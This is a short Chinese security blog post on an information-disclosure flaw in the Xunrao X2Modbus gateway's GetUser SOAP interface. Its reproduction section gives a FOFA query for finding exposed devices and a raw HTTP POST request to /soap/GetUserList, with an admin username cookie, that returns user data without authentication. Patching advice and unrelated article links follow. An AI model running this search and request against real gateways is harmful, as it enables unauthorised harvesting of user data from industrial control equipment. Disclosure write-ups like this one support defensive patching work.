迅饶科技X2Modbus网关-GetUser信息泄露漏洞

免责声明:本号提供的网络安全信息仅供参考,不构成专业建议。作者不对任何由于使用本文信息而导致的直接或间接损害承担责任。如涉及侵权,请及时与我联系,我将尽快处理并删除相关内容。

漏洞描述

该漏洞的存在是由于'GetUser'接口在处理SOAP请求时,缺乏对请求的充分验证和授权检查,任何人都可以通过发送特定的SOAP请求,获取系统中存在的用户信息,攻击者可以通过发送包含合法用户凭据的SOAP请求,绕过身份验证机制,直接获取用户数据。

漏洞再现

FOFA:server="SunFull-Webs"

http://ip:898/login.html页面抓包,在重放器使用下面的格式

POST /soap/GetUserList

HTTP/1.1 ip

Cookie: language=zh-cn; language=zh-cn; username=admin

Content-Length: 12

Connection: close

{"CmpWc":""}

修复建议

对 GetUser 接口的输入进行严格的验证和过滤。确保输入的用户名和密码符合预期的格式和长度,防止恶意用户通过构造特殊字符或语句来获取信息。

定期检查迅饶科技官方网站或相关渠道,获取 X2Modbus 网关的最新安全补丁,并及时应用到系统中。厂商通常会修复已知的漏洞,通过更新补丁可以有效地防止攻击者利用这些漏洞进行信息泄露攻击。

相关推荐
启雀AI1 天前
生物医疗行业如何建设合规、安全、可复用的知识库?
人工智能·安全·软件构建·知识图谱·知识库
楷哥爱开发1 天前
如何使用 Claude Fable 5 进行网页抓取?2026最新实战教程
大数据·网络·人工智能
Sirius Wu1 天前
OpenClaw Skill:Matplotlib 可视化技能 + 沙箱双层隔离完整详解
服务器·网络·人工智能·安全·ai·架构·aigc
酣大智1 天前
常用 IP 协议号大全(IP 层承载的上层协议)
网络·网络协议·tcp/ip
冬奇Lab1 天前
每日一个开源项目(第160篇):Destructive Command Guard - 在 AI Agent 运行 rm -rf 之前拦截它
人工智能·安全·开源
ChainSafeAI0021 天前
Summer.fi 遭600万美元漏洞攻击,安全警报拉响
安全
QXWZ_IA1 天前
1库1图1批是什么?千寻位置公安地图数据体系详解
科技·算法·能源·媒体·交通物流·政务
大公产经晚间消息1 天前
《寻访独角兽》首期走进太仓,探访小科智行的硬科技“突围”
网络·人工智能·科技
一勺菠萝丶1 天前
生产环境平滑升级实战-Nginx维护页数据库迁移与安全回滚
数据库·nginx·安全
JoyCong19981 天前
ToDesk新功能科普:屏幕墙、协作模式、设备别名、USB映射...
网络·科技·电脑·远程工作·远程操作